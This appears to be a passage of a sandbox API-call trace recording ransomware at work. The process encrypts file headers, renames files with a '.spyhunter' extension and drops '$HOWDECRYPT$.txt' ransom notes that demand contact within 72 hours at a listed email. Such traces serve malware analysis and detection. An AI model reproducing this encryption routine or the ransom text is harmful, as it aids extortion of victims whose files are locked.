GetProcessHeap () returned 0x2c0000 [0144.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.952] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f268*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f268*=0x30) returned 1 [0144.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.953] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 94 [0144.953] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".txt") returned 0x0 [0144.953] GetProcessHeap () returned 0x2c0000 [0144.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.953] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f22c*=0x2800, lpOverlapped=0x0) returned 1 [0144.954] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.954] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f22c*=0x2800, lpOverlapped=0x0) returned 1 [0144.955] GetProcessHeap () returned 0x2c0000 [0144.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.955] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.955] WriteFile (in: hFile=0xa0, lpBuffer=0x248f26c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x248f26c*, lpNumberOfBytesWritten=0x248f22c*=0x4, lpOverlapped=0x0) returned 1 [0144.955] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f22c*=0x30, lpOverlapped=0x0) returned 1 [0144.955] CloseHandle (hObject=0xa0) returned 1 [0144.955] GetProcessHeap () returned 0x2c0000 [0144.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.955] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.spyhunter") returned 104 [0144.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.spyhunter")) returned 1 [0144.956] GetProcessHeap () returned 0x2c0000 [0144.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.956] GetProcessHeap () returned 0x2c0000 [0144.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.956] GetProcessHeap () returned 0x2c0000 [0144.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62cc8 | out: hHeap=0x2c0000) returned 1 [0144.956] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f270 | out: pbBuffer=0x248f270) returned 1 [0144.956] GetProcessHeap () returned 0x2c0000 [0144.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.956] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f268*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f268*=0x30) returned 1 [0144.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.957] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 72 [0144.957] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".txt") returned 0x0 [0144.957] GetProcessHeap () returned 0x2c0000 [0144.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.957] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f22c*=0x1a00, lpOverlapped=0x0) returned 1 [0144.958] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffe600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.959] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f22c*=0x1a00, lpOverlapped=0x0) returned 1 [0144.959] GetProcessHeap () returned 0x2c0000 [0144.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.959] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.959] WriteFile (in: hFile=0xa0, lpBuffer=0x248f26c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x248f26c*, lpNumberOfBytesWritten=0x248f22c*=0x4, lpOverlapped=0x0) returned 1 [0144.959] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f22c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f22c*=0x30, lpOverlapped=0x0) returned 1 [0144.959] CloseHandle (hObject=0xa0) returned 1 [0144.959] GetProcessHeap () returned 0x2c0000 [0144.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0144.959] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.spyhunter") returned 82 [0144.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.spyhunter")) returned 1 [0144.960] GetProcessHeap () returned 0x2c0000 [0144.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0144.960] GetProcessHeap () returned 0x2c0000 [0144.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0144.960] GetProcessHeap () returned 0x2c0000 [0144.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5578 | out: hHeap=0x2c0000) returned 1 [0144.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.960] GetProcessHeap () returned 0x2c0000 [0144.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa848 | out: hHeap=0x2c0000) returned 1 [0144.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.961] GetProcessHeap () returned 0x2c0000 [0144.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9af0 | out: hHeap=0x2c0000) returned 1 [0144.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.961] GetProcessHeap () returned 0x2c0000 [0144.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4e20 | out: hHeap=0x2c0000) returned 1 [0144.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.961] GetProcessHeap () returned 0x2c0000 [0144.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa720 | out: hHeap=0x2c0000) returned 1 [0144.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.961] GetProcessHeap () returned 0x2c0000 [0144.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe99b8 | out: hHeap=0x2c0000) returned 1 [0144.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0144.962] GetProcessHeap () returned 0x2c0000 [0144.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc5000 | out: hHeap=0x2c0000) returned 1 [0144.962] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f250 | out: pbBuffer=0x248f250) returned 1 [0144.962] GetProcessHeap () returned 0x2c0000 [0144.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0144.962] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f248*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f248*=0x30) returned 1 [0144.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0144.962] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 126 [0144.962] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0144.963] GetProcessHeap () returned 0x2c0000 [0144.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0144.963] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f20c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f20c*=0x2800, lpOverlapped=0x0) returned 1 [0144.969] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.969] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f20c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f20c*=0x2800, lpOverlapped=0x0) returned 1 [0144.969] GetProcessHeap () returned 0x2c0000 [0144.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0144.969] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.969] WriteFile (in: hFile=0xa0, lpBuffer=0x248f24c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f20c, lpOverlapped=0x0 | out: lpBuffer=0x248f24c*, lpNumberOfBytesWritten=0x248f20c*=0x4, lpOverlapped=0x0) returned 1 [0145.286] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f20c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f20c*=0x30, lpOverlapped=0x0) returned 1 [0145.286] CloseHandle (hObject=0xa0) returned 1 [0145.287] GetProcessHeap () returned 0x2c0000 [0145.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.287] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.spyhunter") returned 136 [0145.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.spyhunter")) returned 1 [0145.287] GetProcessHeap () returned 0x2c0000 [0145.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.288] GetProcessHeap () returned 0x2c0000 [0145.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.288] GetProcessHeap () returned 0x2c0000 [0145.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04010 | out: hHeap=0x2c0000) returned 1 [0145.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.288] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.288] WriteFile (in: hFile=0xa0, lpBuffer=0x248f183*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f2ac, lpOverlapped=0x0 | out: lpBuffer=0x248f183*, lpNumberOfBytesWritten=0x248f2ac*=0x127, lpOverlapped=0x0) returned 1 [0145.289] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.289] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f2ac*=0x2ac, lpOverlapped=0x0) returned 1 [0145.289] CloseHandle (hObject=0xa0) returned 1 [0145.289] GetProcessHeap () returned 0x2c0000 [0145.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69708 | out: hHeap=0x2c0000) returned 1 [0145.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.290] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.290] WriteFile (in: hFile=0xa0, lpBuffer=0x248f17f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f2a8, lpOverlapped=0x0 | out: lpBuffer=0x248f17f*, lpNumberOfBytesWritten=0x248f2a8*=0x127, lpOverlapped=0x0) returned 1 [0145.291] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.291] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f2a8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f2a8*=0x2ac, lpOverlapped=0x0) returned 1 [0145.291] CloseHandle (hObject=0xa0) returned 1 [0145.291] GetProcessHeap () returned 0x2c0000 [0145.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9880 | out: hHeap=0x2c0000) returned 1 [0145.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.358] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.358] WriteFile (in: hFile=0x9c, lpBuffer=0x248f17b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f2a4, lpOverlapped=0x0 | out: lpBuffer=0x248f17b*, lpNumberOfBytesWritten=0x248f2a4*=0x127, lpOverlapped=0x0) returned 1 [0145.359] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.359] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f2a4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f2a4*=0x2ac, lpOverlapped=0x0) returned 1 [0145.359] CloseHandle (hObject=0x9c) returned 1 [0145.359] GetProcessHeap () returned 0x2c0000 [0145.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4cb8 | out: hHeap=0x2c0000) returned 1 [0145.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f240 | out: pbBuffer=0x248f240) returned 1 [0145.360] GetProcessHeap () returned 0x2c0000 [0145.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f238*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f238*=0x30) returned 1 [0145.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0145.414] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 150 [0145.414] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0145.414] GetProcessHeap 